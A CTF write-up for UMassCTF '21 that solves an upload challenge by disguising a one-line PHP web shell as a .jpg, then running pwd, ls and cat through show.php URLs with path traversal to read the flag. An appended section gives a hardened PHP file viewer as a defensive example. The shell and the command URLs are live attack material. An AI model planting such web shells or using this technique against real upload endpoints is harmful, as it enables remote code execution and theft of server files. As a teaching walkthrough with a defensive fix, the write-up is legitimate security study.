This is for the UMassCTF ’21 CTF.
Challenge Author: Cobchise#6969
For this challenge, we are provided the following information:
Here is the hint:
Going to the provided link, we get this page:
I quickly test an image upload to see how it works:
It uploaded the file and gave a link to view it. When I click the link, it essentially prints the contents of the file as if it were text:
This tells me that I need to upload a PHP shell script:
I grab my favorite one-line PHP shell and upload it as a .php file:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Okay, that didn’t work, so I change the extension to .jpg.
It took it:
When I click to see the “image” I get this:
Now I provide some commands as the expected “cmd” argument:
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd
Beautiful! I have a working shell. After some poking around, I find the flag:
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}
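On the defensive side, the behaviour above is consistent with show.php passing the uploaded file to include, which is an assumption because the challenge source is not shown. The following is an added example, not part of the original write-up or the challenge's code, of a viewer that treats uploads strictly as bytes. The upload directory, ID format, and allowed types are hypothetical.

```php
<?php
// Added example: hardened replacement for a viewer like show.php.
// Assumptions (not from the challenge source): uploads live in UPLOAD_DIR
// outside the web root, and stored names are short alphanumeric IDs.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app/uploads';            // hypothetical path
const ALLOWED_TYPES = ['image/jpeg', 'image/png', 'image/gif'];

function fail(int $status): void
{
    http_response_code($status);
    exit;
}

$name = $_GET['filename'] ?? '';

// 1. Accept only the ID format the uploader generates; no dots or slashes.
if (!is_string($name) || !preg_match('/\A[A-Za-z0-9]{1,32}\z/', $name)) {
    fail(400);
}

// 2. Resolve the path and confirm it is still inside the upload directory.
$base = realpath(UPLOAD_DIR);
$path = realpath(UPLOAD_DIR . '/' . $name);
if ($base === false || $path === false
    || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0
    || !is_file($path)) {
    fail(404);
}

// 3. Decide the type from the file's content, not its extension.
$type = (new finfo(FILEINFO_MIME_TYPE))->file($path);
if (!in_array($type, ALLOWED_TYPES, true)) {
    fail(415);
}

// 4. Stream the bytes. readfile() never runs the content through the PHP
//    interpreter, unlike include/require, so an embedded <?php tag is inert
//    even if a crafted file gets past the type check in step 3.
header('Content-Type: ' . $type);
header('X-Content-Type-Options: nosniff');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

The content-type check alone is not the fix, since a file can carry valid image magic bytes and still contain PHP; what removes the code execution is step 4.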